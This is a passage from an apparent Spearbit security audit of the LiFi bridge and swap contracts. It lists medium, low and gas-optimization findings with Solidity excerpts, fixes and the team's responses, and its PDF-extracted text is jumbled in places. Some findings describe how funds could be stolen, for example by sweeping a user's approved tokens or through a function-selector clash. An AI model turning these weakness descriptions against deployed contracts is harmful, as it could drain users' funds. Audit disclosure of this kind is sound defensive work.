pull in multiple different tokens. It also doesn’t detect accidentally sending of native tokens with ERC20 tokens. This approach is counterintuitive and leads to risks. Suppose someone wants to swap 100 USDC to 100 DAI and then 100 DAI to 100 USDT. If the first swap somehow gives back less tokens, for example 90 DAI, then LibSwap.swap() pulls in 10 extra DAI from msg.sender. Note: this requires the msg.sender having given multiple allowances to the LiFi Diamond. Another risk is that an attacker tricks a user to sign a transaction for the LiFi protocol. Within one transaction it can sweep multiple tokens from the user, cleaning out his entire wallet. Note: this requires the msg.sender having given multiple allowances to the LiFi Diamond. In Executor.sol the tokens are already deposited, so the "pull" functionality is not needed and can even result in additional issues. In Executor.sol it tries to "pull" tokens from "msg.sender" itself. In the best case of ERC20 implementations (like OpenZeppeling, Solmate) this has no effect. However some non standard ERC20 imple- mentations might break. 27 contract SwapperV2 is ILiFi { function _executeSwaps(...) ... { ... for (uint256 i = 0; i < _swapData.length; i++) { ... LibSwap.swap(_lifiData.transactionId, currentSwapData); } } } library LibSwap { function swap(...) ... { ... uint256 initialSendingAssetBalance = LibAsset.getOwnBalance(fromAssetId); ... uint256 toDeposit = initialSendingAssetBalance < fromAmount ? fromAmount - ,! initialSendingAssetBalance : 0; ... if (toDeposit != 0) { LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); } } } Use LibAsset.depositAsset() before doing Recommendation: _executeSwaps() / _executeAndCheckSwaps(). This also prevent accidentally sending native tokens with ERC20 tokens (as LibAsset.depositAsset() checks msg.value). In Swapper.sol/ SwapperV2.sol: Change function swap() to something like this: library LibSwap { function swap(...) ... { ... uint256 toDeposit = initialSendingAssetBalance < fromAmount ? fromAmount - initialSendingAssetBalance : 0; if (initialSendingAssetBalance < fromAmount) revert NotEnoughFunds(); ... if (toDeposit != 0) { LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); } } - ,! + - - - } This will also make sure _executeSwaps of Executor.sol doesn’t pull any tokens. Alternatively at least change the names to something like this: • LibSwap.swap() ==> LibSwap.pullTokensAndSwap(). • _executeSwaps() ==> _pullTokensAndExecuteSwaps() (3 locations). • _executeAndCheckSwaps ==> _pullTokensAndExecuteAndCheckSwaps (3 locations). And consider adding an emit of toDeposit. LiFi: Fixed with PR #94 & PR #96. Spearbit: Verified. 28 +5.2.19 Too many bytes are checked to verify the function selector Severity: Medium Risk Context: SwapperV2.sol#L77, Swapper.sol#L74, LibStorage.sol#L4-L8, DexManagerFacet.sol#L114-L143 Description: The function _executeSwaps() slices the callData with 8 bytes. The function selector is only 4 bytes. Also see docs So additional bytes are checked unnecessarily, which is probably unwanted. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) // should be 4 ) revert ContractCallNotAllowed(); ... } } Definition of dexFuncSignatureAllowList in LibStorage.sol: struct LibStorage { ... mapping(bytes32 => bool) dexFuncSignatureAllowList; ... // could be bytes4 } Recommendation: Limit the check on function signatures to 4 bytes in SwapperV2.sol and Swapper.sol -appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) +appStorage.dexFuncSignatureAllowList[bytes4(currentSwapData.callData[:4])]) Change the type of dexFuncSignatureAllowList to bytes4. struct LibStorage { ... mapping(bytes32 => bool) dexFuncSignatureAllowList; mapping(bytes4 => bool) dexFuncSignatureAllowList; ... - + } In DexManagerFacet.sol change the related functions from bytes32 to bytes4 LiFi: Fixed with PR #8. Spearbit: Verified. 29 5.3 Low Risk +5.3.1 Check address(self) isn’t accidentally whitelisted Severity: Low Risk Context: LibAccess.sol#L32-L35, AccessManagerFacet.sol#L10-L22, DexManagerFacet.sol#L27-L57 Description: There are several access control mechanisms. If they somehow would allow address(self) then risks would increase as there are several ways to call arbitrary functions. library LibAccess { function addAccess(bytes4 selector, address executor) internal { ... accStor.execAccess[selector][executor] = true; } } contract AccessManagerFacet { function setCanExecute(...) ... { ) external { ... _canExecute ? LibAccess.addAccess(_selector, _executor) : LibAccess.removeAccess(_selector, ,! _executor); } } contract DexManagerFacet { function addDex(address _dex) external { ... dexAllowlist[_dex] = true; ... } function batchAddDex(address[] calldata _dexs) external { dexAllowlist[_dexs[i]] = true; ... ... } } Recommendation: For extra safety: consider checking address(self) isn’t accidentally whitelisted. LiFi: Implemented with PR #32. Spearbit: Verified. +5.3.2 Verify anyswap token Severity: Low Risk Context: AnyswapFacet.sol#L112-L145 Description: The AnyswapFacet supplies _anyswapData.token to different functions of _anyswapData.router. These functions interact with the contract behind _anyswapData.token. If the _anyswapData.token would be malicious then tokens can be stolen. Note, this is relevant if the LiFi contract are called directly without using the API. 30 function _startBridge(...) ... { ... IAnyswapRouter(_anyswapData.router).anySwapOutNative{ value: _anyswapData.amount }( _anyswapData.token,...); ... IAnyswapRouter(_anyswapData.router).anySwapOutUnderlying( _anyswapData.token, ... ); ... IAnyswapRouter(_anyswapData.router).anySwapOut( _anyswapData.token, ...); ... ,! } Recommendation: Verify that the _anyswapData.token is a real anyswap token with an external source/contract of whitelist them. LiFi: Fixed with white-listing router on the following PR. Spearbit: Verified. +5.3.3 More thorough checks for DAI in swapAndStartBridgeTokensViaXDaiBridge() Severity: Low Risk Context: GnosisBridgeFacet.sol#L78-L112 Description: The function swapAndStartBridgeTokensViaXDaiBridge() checks lifiData.sendingAssetId == DAI, however it doesn’t check that the result of the swap is DAI (e.g. _swapData[_swapData.length - 1].re- ceivingAssetId == DAI ). function swapAndStartBridgeTokensViaXDaiBridge(...) ... { ... if (lifiData.sendingAssetId != DAI) { revert InvalidSendingToken(); } gnosisBridgeData.amount = _executeAndCheckSwaps(lifiData, swapData, payable(msg.sender)); ... _startBridge(gnosisBridgeData); // sends DAI } Recommendation: Consider checking _swapData[_swapData.length - 1].receivingAssetId == DAI )‘. LiFi: Fixed with PR #24. Spearbit: Verified. +5.3.4 Funds transferred via Connext may be lost on destination due to incorrect receiver or calldata Severity: Low Risk Context: AmarokFacet.sol#L128-L129, NXTPFacet.sol#L134-L137 Description: _startBridge() in AmarokFacet.sol and NXTPFacet.sol sets user-provided receiver and call data for the destination chain. • The receiver is intended to be LifiDiamond contract address on destination chain. • The call data is intended such that the functions completeBridgeTokensVia{Amarok/NXTP}() or swapAnd- CompleteBridgeTokensVia{Amarok/NXTP}() are called. In case of a frontend bug or a user error, these parameters can be malformed which will lead to stuck (and stolen) funds on destination chain. Since the addresses and functions are already known, the contract can instead pass this data to Connext instead of taking it from the user. 31 Recommendation: When swaps on the destination are not needed, set callData to empty bytes, and receiver to be the final receiver of funds. Thus, the function completeBridgeTokensViaAmarok() and completeBridgeTo- kensViaNXTP() can be removed. When swaps on the destination are needed, create the call data in _startBridge() with swapAndComplete- BridgeTokensVia{Amarok/NXTP}() and its arguments encoded to reduce the trust on user provided data. In this case, the receiver (from Connext’s perspective) is LifiDiamond contract. Consider one of the following approaches to avoid taking this argument from user: • If LiFi protocol is only deployed on EVM compatible chains, use LifiDiamond’s constant address deployed via CREATE2. • If there is a chance of having different LifiDiamond addresses, create a mapping from Nomad ID to LifiDi- amond address which can only be modified by the owner. Use the destination Nomad ID to get the receiver address. LiFi: Implemented with PR #77. When swaps on destination are needed, we will continue to rely on the API generated calldata at this time. Spearbit: Verified. +5.3.5 Check output of swap is equal to amount bridged Severity: Low Risk Context: PolygonBridgeFacet.sol#L64-L121 Description: The result of swap (amount) isn’t always checked to be the same as the bridged amount (_bridge- Data.amount). This way tokens could stay in the LiFi Diamond if more tokens are received with a swap than bridged. function swapAndStartBridgeTokensViaPolygonBridge(...) ... { ... uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender)); ... _startBridge(_lifiData, _bridgeData, true); } function _startBridge(..., BridgeData calldata _bridgeData, ...) ... { ... if (LibAsset.isNativeAsset(_bridgeData.assetId)) { rootChainManager.depositEtherFor{ value: _bridgeData.amount }(_bridgeData.receiver); } else { ... LibAsset.maxApproveERC20(IERC20(_bridgeData.assetId), _bridgeData.erc20Predicate, ,! _bridgeData.amount); bytes memory depositData = abi.encode(_bridgeData.amount); rootChainManager.depositFor(_bridgeData.receiver, _bridgeData.assetId, depositData); } ... } Recommendation: Check output of swap is equal to the amount bridged. Or send the remaining tokens to the msg.sender. Note: also see issue "Use same layout for facets" LiFi: Fixed with PR #68. Spearbit: Verified. 32 +5.3.6 Missing timelock logic on the DiamondCut facets Severity: Low Risk Context: LibDiamond.sol Description: In LiFi Diamond, any facet address/function selector can be changed by the contract owner. Connext, Diamond should go through a proposal window with a delay of 7 days. In function diamondCut( FacetCut[] calldata _diamondCut, address _init, bytes calldata _calldata ) external override { LibDiamond.enforceIsContractOwner(); LibDiamond.diamondCut(_diamondCut, _init, _calldata); } Recommendation: Consider implementing timelock logic when updating addresses/functions selectors. LiFi: LiFi Team claims that they don’t plan to add this at this time. Will revisit in the future. Spearbit: Acknowledged. +5.3.7 Data from emit LiFiTransferStarted() can’t be relied on Severity: Low Risk Context: OmniBridgeFacet.sol#L34-L107 Description: Most of the function do an emit like LiFiTransferStarted(). Some of the fields of the emits are (sometimes) verified, but most fields come from the input variable _lifiData. The problem with this is that anyone can do solidity transactions to the LiFi bridge and supply wrong data for the emit. For example: transfer a lot of Doge coins and in the emit say they are transferring wrapped BTC. Then the statistics would say a large amount of volume has been transferred, while in reality it is neglectable. The advantage of using a blockchain is that the data is (seen as) reliable. If the data isn’t reliable, it isn’t worth the trouble (gas cost) to store it in a blockchain and it could just be stored in an offline database. The result of this is, its not useful to create a subgraph on the emit data (because it is unreliable). This would mean a lot of extra work for subgraph builders to reverse engineer what is going on. Also any kickback fees to in- tegrators or referrers cannot be based on this data because it is unreliable. Also user interfaces & dashboards could display the wrong information. 33 function startBridgeTokensViaOmniBridge(LiFiData calldata _lifiData, ...) ... { ... LibAsset.depositAsset(_bridgeData.assetId, _bridgeData.amount); _startBridge(_lifiData, _bridgeData, _bridgeData.amount, false); } function _startBridge(LiFiData calldata _lifiData, ... ) ... { ... // do actions emit LiFiTransferStarted( _lifiData.transactionId, "omni", "", _lifiData.integrator, _lifiData.referrer, _lifiData.sendingAssetId, _lifiData.receivingAssetId, _lifiData.receiver, _lifiData.amount, _lifiData.destinationChainId, _hasSourceSwap, false ); } Recommendation: Consider checking the data. One way to do this would be that the API signs the data and the signature is checked. LiFi: We decided not to validate the chainId for some bridges like Amarok and Stargate as we would incur in high gas costs for storing mappings and decoding payloads. Spearbit: Verified + acknowledged for _lifiData.transactionId, _lifiData.integrator, _lifiData.referrer and chainId for Amarok and Stargate. +5.3.8 Missing emit in XChainExecFacet Severity: Low Risk Context: Executor.sol#L178-L221, XChainExecFacet.sol#L17-L52 Description: The function swapAndCompleteBridgeTokens of Executor does do an emit LiFiTransferCom- pleted , while the comparable function in XChainExecFacet doesn’t do this emit. This way there will be missing emits. contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function swapAndCompleteBridgeTokens(LiFiData calldata _lifiData, ... ) ... { ... emit LiFiTransferCompleted( ... ); } } contract XChainExecFacet is SwapperV2, ReentrancyGuard { function swapAndCompleteBridgeTokens(LiFiData calldata _lifiData, ... ) ... { ... // no emit } } Recommendation: Implement the emits in a consistent way. LiFi: File is deleted with the following PR. Spearbit: Verified. 34 +5.3.9 Different access control to withdraw funds Severity: Low Risk Context: WithdrawFacet.sol#L42-L44, WithdrawFacet.sol#L70 Description: To withdraw any stuck tokens, WithdrawFacet.sol provides two functions: executeCallAndWith- draw() and withdraw(). Both have different access controls on them. • executeCallAndWithdraw() can be called by the owner or if msg.sender has been approved to call a function whose signature matches that of executeCallAndWithdraw(). • withdraw() can only be called by the owner. If the function signature of executeCallAndWithdraw() clashes with an approved signature in execAccess map- ping, the approved address can steal all the funds in LifiDiamond contract. Recommendation: • Update executeCallAndWithdraw() so that it can only be called by the owner. • Or, check that no other function with signature clashing with executeCallAndWithdraw() is added to exe- cAccess. LiFi: Acknowledged. Spearbit: Acknowledged. +5.3.10 Use internal where possible Severity: Low Risk Context: StargateFacet.sol#L160, StargateFacet.sol#L180, Executor.sol#L132, Executor.sol#L272-L288 Description: Several functions have an access control where the msg.sender if compared to address(this), which means it can only be called from the same contract. In the current code with the various generic call mechanisms this isn’t a safe check. For example the function _execute() from Executor.sol can circumvent this check. Luckily the function where this has been used have a low risk profile so the risk of this issue is limited. function swapAndCompleteBridgeTokensViaStargate(...) ... { if (msg.sender != address(this)) { revert InvalidCaller(); } ... } Recommendation: Make the functions internal and remove the (msg.sender != address(this)) check. necessary move modifiers to the calling function If LiFi: Deprecated with this PR PR #73. Spearbit: Verified. 35 +5.3.11 Event of transfer is not emitted in the AxelarFacet Severity: Low Risk Context: AxelarFacet.sol#L30-L89, Executor.sol#L272-L316 Description: The usage of the LiFi protocol depends largely to the off chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs. The events are useful to record these changes on-chain for off-chain monitors/tools/interfaces when integrating with off-chain APIs. Although, other facets are emitting LiFiTransferStarted event, AxelarFacet does not emit this event. contract AxelarFacet { function executeCallViaAxelar(...) ... {} function executeCallWithTokenViaAxelar(...) ... {} } On the receiving side, the Executor contract does do an emit in function _execute() but not in function _- executeWithToken(). contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _execute(...) ... { ... emit AxelarExecutionComplete(callTo, bytes4(callData)); } function _executeWithToken( ... // no emit } } Recommendation: Because of the integration with off-chain APIs, ensure that all events are implemented in the facets and on the receiving side. LiFi: Fixed with PR #67. Spearbit: Verified. +5.3.12 Improve checks on the facets Severity: Low Risk Context: AxelarFacet.sol#L69, CBridgeFacet.sol#L95-L106, GnosisBridgeFacet.sol#L120, HopFacet.sol#L115- L126, HyphenFacet.sol#L106-L112, Executor.sol#L309 Description: In the facets, receiver/destination address and amount checks are missing. • The symbol parameter is used to get address of token with gateway’s tokenAddresses function. tokenAd- dresses function get token address by mapping. If the symbol does not exist, the token address can be zero. AxelarFacet and Executor do not check If the given symbol exists or not. 36 contract AxelarFacet { function executeCallWithTokenViaAxelar(...) ... { address tokenAddress = s.gateway.tokenAddresses(symbol); } function initAxelar(address _gateway, address _gasReceiver) external { s.gateway = IAxelarGateway(_gateway); s.gasReceiver = IAxelarGasService(_gasReceiver); } } contract Executor { function _executeWithToken(...) ... { address tokenAddress = s.gateway.tokenAddresses(symbol); } } • GnosisBridgeFacet, CBridgeFacet, HopFacet and HyphenFacets are missing receiver address/amount check. contract CBridgeFacet { function _startBridge(...) ... { ... _cBridgeData.receiver ... } } contract GnosisBridgeFacet { function _startBridge(...) ... { ... gnosisBridgeData.receiver ... } } contract HopFacet { function _startBridge(...) ... { _hopData.recipient, ... ... } } contract HyphenFacet { function _startBridge(...) ... { _hyphenData.recipient ... ... } } Recommendation: Implement necessity checks (receiver address and bridge amount check) on the facets. LiFi: Fixed with PR #63. Spearbit: Verified. 37 +5.3.13 Use keccak256() instead of hex Severity: Low Risk Context: Facet.sol#L11, StargateFacet.sol#L18, LibAccess.sol#L9-L10, LibDiamond.sol#L7 ReentrancyGuard.sol#L10, AxelarFacet.sol#L11, OwnershipFacet.sol#L13, PeripheryRegistry- Description: Several NAMESPACEs are defined, some with a hex value and some with a keccak256(). To be able to verify they are all different it is better to use the same format everywhere. If they would use the same value then the variables stored on that location could interfere with each other and the LiFi Diamond could start to behave unreliably. ... NAMESPACE = hex"c7..."; // keccak256("com.lifi.facets.axelar") ... NAMESPACE = hex"cf..."; // keccak256("com.lifi.facets.ownership"); ... NAMESPACE = hex"a6..."; ReentrancyGuard.sol: AxelarFacet.sol: OwnershipFacet.sol: PeripheryRegistryFacet.sol: ... NAMESPACE = hex"dd..."; // keccak256("com.lifi.facets.periphery_registry"); ,! StargateFacet.sol: LibAccess.sol: ,! LibDiamond.sol: keccak256("com.lifi.library.access.management") ... NAMESPACE = keccak256("com.lifi.facets.stargate"); ... ACCESS_MANAGEMENT_POSITION = hex"df..."; // ... DIAMOND_STORAGE_POSITION = keccak256("diamond.standard.diamond.storage"); Recommendation: Change all lines to use the keccak256() format and optionally add the hex notation. Preferable use NAMESPACE everywhere, except for the standard LibDiamond.sol. -ReentrancyGuard.sol: +ReentrancyGuard.sol: -AxelarFacet.sol: +AxelarFacet.sol: -OwnershipFacet.sol: +OwnershipFacet.sol: -PeripheryRegistryFacet.sol: ,! +PeripheryRegistryFacet.sol: hex"dd..."; ,! -LibAccess.sol: ,! +LibAccess.sol: -StargateFacet.sol: +StargateFacet.sol: ... NAMESPACE = hex"a6..."; ... NAMESPACE = keccak256("com.lifi.reentrancyguard"); // hex"a6..."; ... NAMESPACE = hex"c7..."; // keccak256("com.lifi.facets.axelar") ... NAMESPACE = keccak256("com.lifi.facets.axelar"); // hex"c7..."; ... NAMESPACE = hex"cf..."; // keccak256("com.lifi.facets.ownership"); ... NAMESPACE = keccak256("com.lifi.facets.ownership"); // hex"cf..."; keccak256("com.lifi.facets.periphery_registry"); ... NAMESPACE = hex"dd..."; // ... NAMESPACE = keccak256("com.lifi.facets.periphery_registry"); // keccak256("com.lifi.library.access.management") ... ACCESS_MANAGEMENT_POSITION = hex"df..."; // ... NAMESPACE = keccak256("com.lifi.library.access.management") ... NAMESPACE = keccak256("com.lifi.facets.stargate"); ... NAMESPACE = keccak256("com.lifi.facets.stargate"); // hex"..." // hex"df..."; LiFi: Fixed with PR #38. Spearbit: Verified. +5.3.14 Remove redundant Swapper.sol Severity: Low Risk Context: Swapper.sol, SwapperV2.sol, WormholeFacet.sol#L13 Description: There are two versions of Swapper.sol (e.g Swapper.sol and SwapperV2.sol ) which are function- ally more or less the same. The WormholeFacet contract is the only one still using Swapper.sol. Having two versions of the same code is confusing and difficult to maintain. import { Swapper } from "../Helpers/Swapper.sol"; contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { } Recommendation: Remove Swapper.sol and fix any issues in SwapperV2.sol (see other issues in this document for issues with SwapperV2.sol ) 38 LiFi: Swapper.sol is removed with the following PR #27. Spearbit: Verified. +5.3.15 Use additional checks for transferFrom() Severity: Low Risk Context: AxelarFacet.sol#L59-L89, ERC20Proxy.sol#L38-L47, FusePoolZap.sol#L41-L73, LibSwap.sol#L30-L68 Description: Several functions transfer tokens via transferFrom() without checking the return code. Some of the contracts are not covering edge cases like non-standard ERC20 tokens that do not: • revert on failed transfers. • Some ERC20 implementations don’t revert is the balance is insufficient but return false. Other functions transfer tokens with checking if the amount of tokens received is equal to the amount of tokens requested. This relevant for tokens that withhold a fee. Luckily there is always additional code, like bridge, dex or pool code, that verifies the amount of tokens received, so the risk is limited. contract AxelarFacet { function executeCallWithTokenViaAxelar(... ) ... { ... IERC20(tokenAddress).transferFrom(msg.sender, address(this), amount); // no check on return ,! code & amount of tokens ... } } contract ERC20Proxy is Ownable { function transferFrom(...) ... { ... IERC20(tokenAddress).transferFrom(from, to, amount); // no check on return code & amount of ,! tokens ... } } contract FusePoolZap { function zapIn(...) ... { ... IERC20(_supplyToken).transferFrom(msg.sender, address(this), _amount); // no check on amount of tokens ,! return code & } } library LibSwap { function swap(...) ... { ... LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); // no check on amount of tokens } ,! } Recommendation: Always use LibAsset.transferFromERC20() in combination with a check on the amount of tokens like in LibAssetdepositAsset(). Also see issue "Move code to check amount of tokens transferred to library". LiFi: Fixed with PR #21. Spearbit: Verified. 39 +5.3.16 Move code to check amount of tokens transferred to library Severity: Low Risk Context: ArbitrumBridgeFacet.sol#L50-L55, GenericBridgeFacet.sol#L41-L45, OptimismBridgeFacet.sol#L49- L54, PolygonBridgeFacet.sol#L49-L54, StargateFacet.sol#L81-L86, LibAsset.sol#L99-L101 in ArbitrumBridgeFacet.sol, GenericBridge- Description: Facet.sol,OptimismBridgeFacet.sol, PolygonBridgeFacet.sol and StargateFacet.sol, to verify all required tokens are indeed transferred. The following piece of code is present However it doesn’t check msg.value == _bridgeData.amount in case a native token is used. The more generic depositAsset() of LibAsset.sol does have this check. uint256 _fromTokenBalance = LibAsset.getOwnBalance(_bridgeData.assetId); LibAsset.transferFromERC20(_bridgeData.assetId, msg.sender, address(this), _bridgeData.amount); if (LibAsset.getOwnBalance(_bridgeData.assetId) - _fromTokenBalance != _bridgeData.amount) { revert InvalidAmount(); } Recommendation: Use LibAsset.depositAsset(). And/or consider integrating this functionality to check the amount of tokens transferred, in function LibAsset.transferFromERC20() for situations where msg.value is used in combination with ERC20 transfers, for example to pay fees. LiFi: Fixed with PR #57. Spearbit: Verified. +5.3.17 Fuse pools are not whitelisted Severity: Low Risk Context: FusePoolZap.sol#L42 Description: Rari Fuse is a permissionless framework for creating and running user-created open interest rate pools with customizable parameters. On the FusePoolZap contract, the correctness of pool is not checked. Be- cause of Fuse is permissionless framework, an attacker can create a fake pool, through this contract a user can be be tricked in the malicious pool. function zapIn( address _pool, address _supplyToken, uint256 _amount ) external {} Recommendation: It is recommended to verify correctness of the pool, for instance poolExists can be utilized for this purpose. LiFi: Fixed with PR #6. Spearbit: Verified. 40 +5.3.18 Missing two-step transfer ownership pattern Severity: Low Risk Context: Executor.sol#L19 Description: Executor contract used for arbitrary cross-chain and same chain execution, swaps and transfers. The Executor contract uses Ownable from OpenZeppelin which is a simple mechanism to transfer the ownership not supporting a two-steps transfer ownership pattern. OpenZeppelin describes Ownable as: Ownable is a simpler mechanism with a single owner "role" that can be assigned to a single account. This simpler mechanism can be useful for quick tests but projects with production concerns are likely to outgrow it. Transferring ownership is a critical operation and transferring it to an inaccessible wallet or renouncing the owner- ship e.g. by mistake, can effectively lost functionality. Recommendation: It is recommended to implement a two-step transfer ownership mechanism where the owner- ship is transferred and later claimed by a new owner to confirm the whole process and prevent lockout. As OpenZeppelin ecosystem does not provide such implementation it has to be done in-house. For the inspiration BoringOwnable can be considered, however it has to be well tested, especially in case it is integrated with other OpenZeppelin’s contracts used by the project. References • access • BoringOwnable LiFi: Fixed with PR #20. Spearbit: Verified. +5.3.19 Use low-level call only on contract addresses Severity: Low Risk Context: Executor.sol#L285, Executor.sol#L314 Description: In the following case, if callTo is an EOA, success will be true. (bool success, ) = callTo.call(callData); The user intention here will be to do a smart contract call. So if there is no code deployed at callTo, the execution should be reverted. Otherwise, users can be under a wrong assumption that their cross-chain call was successful. Recommendation: Check if callTo is an EOA (which means it doesn’t have any code), and revert if so. This is shown in the following diff: + bool isContract = LibAsset.isContract(callTo); + if (!isContract) { + + } (bool success, ) = callTo.call(callData); revert CallToEoaAddress(); LiFi: Fixed with PR #12. Spearbit: Verified. 41 +5.3.20 Functions which do not expect ether should be non-payable Severity: Low Risk Context: AmarokFacet.sol#L63 Description: A function which doesn’t expect ether should not be marked payable. swapAndStartBridgeTo- kensViaAmarok() is a payable function, however it reverts when called for the native asset: if (_bridgeData.assetId == address(0)) { revert TokenAddressIsZero(); } So in the case where _bridgeData.assetId != address(0), any ether sent as msg.value is locked in the con- tract. Recommendation: Remove payable keyword for swapAndStartBridgeTokensViaAmarok() which will make this function revert if it receives ether. LiFi: Fixed with PR #19. Spearbit: Verified. +5.3.21 Incompatible contract used in the WormholeFacet Severity: Low Risk Context: WormholeFacet.sol#L13 Description: During the code review, It has been observed that all other faucets are using SwapperV2 contract. However, the WormholeFacet is still using Swapper contract. With the recent change on the SwapperV2, leftOvers can be send to specific receiver. With the using old contract, this capability will be lost in the related faucet. Also, LiFi Team claims that Swapper contract will be deprecated. ... import { Swapper } from "../Helpers/Swapper.sol"; /// @title Wormhole Facet /// @author [LI.FI](https://li.fi) /// @notice Provides functionality for bridging through Wormhole contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { ... Recommendation: Consider using SwapperV2 instead of Swapper contract. LiFi: Fixed with commit 6f2d. Spearbit: Verified. +5.3.22 Solidity version bump to latest Severity: Low Risk Context: LiFi src Description: During the review the newest version of solidity was released with the important bug fixes & Bug. Recommendation: Move from 0.8.13 to 0.8.17. LiFi: Fixed with PR #95. Spearbit: Verified. 42 +5.3.23 Bridge with AmarokFacet can fail due to hardcoded variables Severity: Low Risk Context: AmarokFacet.sol#L137 Description: During the code review, It has been observed that callbackFee and relayerFee are set to 0. However, Connext mentioned that Its set to 0 on the testnet. On the mainnet, these variables can be edited by Connext and AmarokFacet bridge operations can fail. ... IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({ params: IConnextHandler.CallParams({ to: _bridgeData.receiver, callData: _bridgeData.callData, originDomain: _bridgeData.srcChainDomain, destinationDomain: _bridgeData.dstChainDomain, agent: _bridgeData.receiver, recovery: msg.sender, forceSlow: false, receiveLocal: false, callback: address(0), callbackFee: 0, // fee paid to relayers; relayers don't take any fees on testnet relayerFee: 0, // fee paid to relayers; relayers don't take any fees on testnet slippageTol: _bridgeData.slippageTol }), transactingAssetId: _bridgeData.assetId, amount: _amount }); ... Recommendation: It is recommended to take callbackFee and relayerFee parameters from the _bridgeData. LiFi: Fixed with PR #31. Spearbit: Verified. 5.4 Gas Optimization +5.4.1 Store _dexs[i] into a temp variable Severity: Gas Optimization Context: DexManagerFacet.sol#L51-L97 Description: The DexManagerFacet can store _dexs[i] into a temporary variable to save some gas. function batchAddDex(address[] calldata _dexs) external { if (msg.sender != LibDiamond.contractOwner()) { LibAccess.enforceAccessControl(); } mapping(address => bool) storage dexAllowlist = appStorage.dexAllowlist; uint256 length = _dexs.length; for (uint256 i = 0; i < length; i++) { _checkAddress(_dexs[i]); if (dexAllowlist[_dexs[i]]) continue; dexAllowlist[_dexs[i]] = true; appStorage.dexs.push(_dexs[i]); emit DexAdded(_dexs[i]); } } 43 Recommendation: Store _dexs[i] in a temp variable. LiFi: Fixed with commit 7c3c. Spearbit: Verified. +5.4.2 Optimize array length in for loop Severity: Gas Optimization Context: SwapperV2.sol#L72, Swapper.sol#L69, StargateFacet.sol#L107, GenericBridgeFacet.sol#L78, Execu- tor.sol#L328 Description: In a for loop the length of an array can be put in a temporary variable to save some gas. This has been done already in several other locations in the code. function swapAndStartBridgeTokensViaStargate(...) ... { ... for (uint8 i = 0; i < _swapData.length; i++) { ... } ... } Recommendation: In a for loop, store the length of an array in a temporary variable. LiFi: Fixed with PR #84. Spearbit: Verified. +5.4.3 StargateFacet can be optimized Severity: Gas Optimization Context: StargateFacet.sol#L206 Description: It might be cheaper to call getTokenFromPoolId in a constructor and store in immutable variables (especially because there are not that many pool, currently max 3 per chain pool-ids ) On the other hand, It requires an update of the facet when new pools are added though. function getTokenFromPoolId(address _router, uint256 _poolId) private view returns (address) { address factory = IStargateRouter(_router).factory(); address pool = IFactory(factory).getPool(_poolId); return IPool(pool).token(); } For the srcPoolId it would be possible to replace this with a token address in the calling interface and lookup the poolid. However, for dstPoolId this would be more difficult, unless you restrict it to the case where srcPoolId == dstPoolId e.g. the same asset is received on the destination chain. This seems a logical restriction. The advantage of not having to specify the poolids is that you abstract the interface from the caller and make the function calls more similar. Recommendation: If there is no logical restriction, consider keeping variables as an immutables in the constructor. LiFi: Deprecated by PR #75. Spearbit: Acknowledged. 44 +5.4.4 Use block.chainid for chain ID verification in HopFacet Severity: Gas Optimization Context: HopFacet.sol#L102, HopFacet.sol#L110 Description: HopFacet.sol uses user provided _hopData.fromChainId to identify current chain ID. Call to Hop Bridge will revert if it does not match block.chain, so this is still secure. However, as a gas optimization, this parameter can be removed from HopData struct, and its usage can be replaced by block.chainid. Recommendation: Apply the following diff: - if (_hopData.fromChainId == _hopData.toChainId) revert CannotBridgeToSameNetwork(); + if (block.chainid == _hopData.toChainId) revert CannotBridgeToSameNetwork(); ... - if (_hopData.fromChainId == 1) { + if (block.chainid == 1) { LiFi: Fixed with PR #46. Spearbit: Verified. +5.4.5 Rename event InvalidAmount(uint256) to ZeroAmount() Severity: Gas Optimization Context: FusePoolZap.sol#L27, FusePoolZap.sol#L51-L53, FusePoolZap.sol#L83-L85 Description: event InvalidAmount(uint256) is emitted only with an argument of 0: if (_amount <= 0) { revert InvalidAmount(_amount); } ... if (msg.value <= 0) { revert InvalidAmount(msg.value); } Since amount and msg.value can only be non-negative, these if conditions succeed only when these values are 0. Hence, only InvalidAmount(0) is ever emitted. Recommendation: Rename the event InvalidAmount(uint256) to ZeroAmount(), and the if conditions as follows: if (_amount == 0) { revert ZeroAmount(); } ... if (msg.value == 0) { revert ZeroAmount(); } LiFi: Fixed with PR #42. Spearbit: Verified. 45 +5.4.6 Use custom errors instead of strings Severity: Gas Optimization LibDiamond.sol#L56, Context: LibDiamond.sol#L95, LibDiamond.sol#L102, LibBytes.sol#L280 LiFiDiamond.sol#L38, LibDiamond.sol#L84, LibDiamond.sol#L86, Description: To save some gas the use of custom errors leads to cheaper deploy time cost and run time cost. The run time cost is only relevant when the revert condition is met. Recommendation: Consider using custom errors instead of revert strings. LiFi: Fixed with PR #15. Spearbit: Verified. +5.4.7 Use calldata over memory Severity: Gas Optimization Context: AxelarFacet.sol#L32 AxelarFacet.sol#L31, AxelarFacet.sol#L32, AxelarFacet.sol#L60, AxelarFacet.sol#L61, Description: When a function with a memory array is called externally, the abi.decode() step has to use a for-loop to copy each index of the calldata to the memory index. Each iteration of this for-loop costs at least 60 gas (i.e. 60 * .length). Using calldata directly, obliviates the need for such a loop in the contract code and runtime execution. If the array is passed to an internal function which passes the array to another internal function where the array is modified and therefore memory is used in the external call, it’s still more gass-efficient to use calldata when the external function uses modifiers, since the modifiers may prevent the internal functions from being called. Some gas savings if function arguments are passed as calldata instead of memory. Recommendation: Use calldata in these instances. LiFi: Fixed with PR #59. Spearbit: Verified. +5.4.8 Avoid reading from storage when possible Severity: Gas Optimization Context: FeeCollector.sol#L119, FeeCollector.sol#L136, FeeCollector.sol#L161 Description: Functions, which can only be called 